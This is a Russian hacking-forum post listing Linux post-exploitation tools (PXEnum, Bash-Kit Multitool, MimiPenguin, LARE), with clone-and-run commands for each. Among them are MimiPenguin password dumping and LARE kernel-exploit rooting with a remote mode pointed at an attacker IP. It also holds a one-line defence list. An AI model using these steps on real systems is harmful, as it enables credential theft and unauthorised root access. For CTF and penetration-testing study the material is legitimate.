Взлом
Уважаемые гости! При посещении нашего сайта просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.п., а также при обращении за помощью просим быть внимательными: на сайте есть как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант-сервиса. Спасибо, что посетили форум хакеров.

bbc_Hash

Модератор
Команда форума
Пользователь
Регистрация
8 Янв 2019
Сообщения
527
Реакции
71
Баллы
118


Сегодня — минимум слов, максимум практики. Ниже представлены инструменты пост-эксплуатации для Linux, которые применяются после получения доступа к машине в периметре сети или на CTF.


Что такое пост-эксплуатация:
Фаза после выполнения кода на целевой машине. На этом этапе злоумышленник:


  • Выполняет произвольные команды
  • Изучает локальные данные
  • Организует перманентный доступ
  • Эскалирует привилегии
  • Перехватывает будущие данные

Также анализируются:


  • Конфигурации системы и веб-серверов
  • Исходный код
  • Доступы к БД
  • Сетевые сегменты

ТОП инструментов пост-эксплуатации под Linux:


1. PXEnum — сбор всей инфы о системе

Скрипт, вытаскивающий максимум сведений о машине. Работает без root, запускается в обычном терминале.
Установка:

git clone https://github.com/shawnduong/PXEnum.git
cd PXEnum
chmod +x PXEnum.sh
bash PXEnum.sh


2. MIDA Multitool — SysEnum и RootHelper в одном флаконе
Собирает данные о системе и помогает с привилегиями.
Установка:

git clone https://github.com/NullArray/Bash-Kit-Multitool
cd Bash-Kit-Multitool
chmod +x bashkit.sh
./bashkit.sh


3. MimiPenguin — сброс паролей в Linux
Аналог mimikatz для Linux. Поддерживает Apache2, OpenSSH, FTP и другие сервисы.
Установка:

git clone https://github.com/huntergregal/mimipenguin
cd mimipenguin
chmod +x mimipenguin.sh
./mimipenguin.sh


4. LARE — получение root через уязвимости ядра
Скрипт для root-доступа через баги Linux Kernel 2.6–4.8. Часто используется на экзаменах OSCP.
Установка:

git clone https://github.com/EnigmaDimitri/LARE && cd LARE
chmod +x LARE.sh
./LARE.sh -a


Удалённый запуск:

./LARE.sh -l [IP атакующего]


Как защититься от пост-эксплуатации:


  • Своевременные патчи
  • Ограниченные права доступа
  • Специализированные средства контроля системы

Материал предоставлен только в ознакомительных целях.
 
MimiPenguin скрипт робочий и полезный.
 
Яндекс.Метрика